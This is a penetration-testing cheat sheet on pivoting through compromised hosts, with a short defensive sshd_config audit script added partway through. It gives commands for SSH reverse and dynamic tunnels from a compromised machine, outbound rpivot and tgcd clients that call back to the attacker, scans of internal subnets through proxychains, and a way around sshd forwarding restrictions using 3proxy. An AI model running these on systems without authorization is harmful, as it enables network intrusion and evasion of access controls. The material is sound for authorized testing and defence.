Pivoting
rinetd
root # rinetd -f -c rinetd.conf
root # cat rinetd.conf
plink.exe
SSH client for Windows: plink.exe
C:> plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N
ssh / OpenSSH
SSH local port forwarding ("proxy", run on the attacker machine)
Local port → remote server
root # ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
root # ssh -L <localhost port>:<remote IP>:<remote port> $IP
Remote redirection (SSH remote port forwarding: the "reverse shell" direction, run on a compromised machine)
root # ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP
root # ssh -R <server side port>:<localhost>:<local port> $IP
With ssh -L / -R the locally mapped ports are always bound to 127.0.0.1; to expose them on the eth0/tun0 interfaces, use tgcd or socat!
Open question: how to forward a local Apache on the attacker machine into the private LAN through the pivot.
Dynamic port forwarding (socks4/5 proxy)
root # ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>
VPN over SSH
In /etc/ssh/sshd_config on the server:
PermitRootLogin yes
PermitTunnel yes
root # ssh [email protected] -w any:any
Routing is not automatic: add the routes and gateway yourself, and enable IP forwarding on the server.
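As an added example that is not part of the original page, the following script audits the global sshd_config directives this VPN-over-SSH recipe and the -L/-R/-D forwardings depend on, from the defender's side. It assumes OpenSSH's own parsing rules (the first occurrence of a keyword wins, keywords are case-insensitive, comments are whole lines, and directives after a Match line are conditional); the sample configurations are constructed.

```python
# Added example, not part of the original page: audit the global sshd_config
# directives that make an SSH server usable as a pivot (PermitTunnel for -w,
# AllowTcpForwarding for -L/-R/-D, GatewayPorts, PermitRootLogin).
# Assumed OpenSSH rules: the first occurrence of a keyword wins, keywords are
# case-insensitive, comments are whole lines, anything after "Match" is conditional.

# Defaults from sshd_config(5) (OpenSSH 7.0+) when a keyword is absent.
DEFAULTS = {
    "permittunnel": "no",
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permitrootlogin": "prohibit-password",
}

def effective_global(config_text: str) -> dict:
    """Return the effective global value of each audited keyword."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # "Keyword value" or "Keyword=value", one keyword per line.
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break  # everything below applies only to matching sessions
        if key in DEFAULTS and key not in seen and len(parts) == 2:
            seen[key] = parts[1].strip().lower()  # first occurrence wins
    return {k: seen.get(k, d) for k, d in DEFAULTS.items()}

def findings(config_text: str) -> list:
    """List keyword=value pairs that leave a pivoting feature enabled.
    Anything other than "no" is reported, so PermitRootLogin's default
    prohibit-password shows up too (root over keys still pivots)."""
    eff = effective_global(config_text)
    return [f"{k}={v}" for k, v in eff.items() if v != "no"]

# Constructed sample with the settings the VPN-over-SSH section requires.
PIVOT_FRIENDLY = """\
PermitRootLogin yes
PermitTunnel yes
# sshd ignores the next line: the first PermitTunnel above wins
PermitTunnel no
Match User backup
    AllowTcpForwarding no
"""
HARDENED = "PermitRootLogin no\nAllowTcpForwarding no\nPermitTunnel no\n"
if __name__ == "__main__":
    print(findings(PIVOT_FRIENDLY))  # 3 findings: tunnel, tcp forwarding, root
    print(findings(HARDENED))        # []
```

AllowTcpForwarding no only restrains sshd itself; a user with a shell can still run a proxy of their own (the 3proxy section below makes that point), so pair it with egress filtering on the host.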
proxychains
From the compromised machine (as the hax0r user):
root # ssh -f -N -R 2222:127.0.0.1:22 [email protected]
root # ssh -f -N -D 127.0.0.1:8080 -p 2222 [email protected]
Edit /etc/proxychains.conf:
[ProxyList]
socks4 127.0.0.1 8080
proxychains only handles TCP connect traffic, and it is incredibly slow!
root # proxychains nmap --top-ports=20 -sT -Pn $IP/24
For proxying DNS, change /usr/lib/proxychains3/proxyresolv.
FreeSSHd.exe
Good to install on the target for pivoting!
tinyproxy
https://github.com/tinyproxy/tinyproxy
rpivot
- Reverse SOCKS proxy (the opposite of ssh -D); supports Windows credentials for use with a corporate proxy
- The server is started on the pentester's machine and listens for incoming connections from the client.
- Written in Python, with no dependencies
Pentester machine (listener):
$ python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP
Target machine (if egress traffic is not firewalled):
$ python client.py --server-ip $IP --server-port 9900
3proxy
On the target (can bypass the target's sshd TCP-forwarding restrictions):
For a SOCKS proxy:
$ cat 3proxy.config
For port redirection:
$ cat 3proxy.config
Run:
$ ./3proxy 3proxy.config &
tgcd
tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. It can also be used by network analysts and security experts for penetration testing and for analysing the security of their network. The program has three different modes:
- CC (ConnectConnect)
- LL (ListenListen)
- PF (PortForwarder)
CC and LL nodes are used together to provide access to a service inside a local area network from the external network. A PF node, however, is only a simple port forwarder.
On the attacker (does not support VPN):
$ tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10
On the target:
$ tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10
Metasploit
msf> use auxiliary/server/socks4a
msf> run -j
or
meterpreter> run autoroute -s $IP/24
meterpreter> run autoroute -p
or
msf exploit(handler) > route add $IP 255.255.255.0 1
ssf
socat
- Socat TCP gender changer
On the inside LAN server:
root # socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80
On the outside LAN client:
root # socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10
Connect with the outside client:
$ mozilla http://127.0.0.1/
- Socat SSH encapsulation into SSL
On the server:
root # socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'
On the client (note the closing quote around the socat address chain, which the original command was missing):
root # ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080'" $SERVER
- Socat SSH deception (bounces the connection back to the client's own SSH server)
root # socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"
Source: https://twitter.com/climagic/status/1079026659435704320
See also socat
References:
- Gerhard Rieger http://www.dest-unreach.org/socat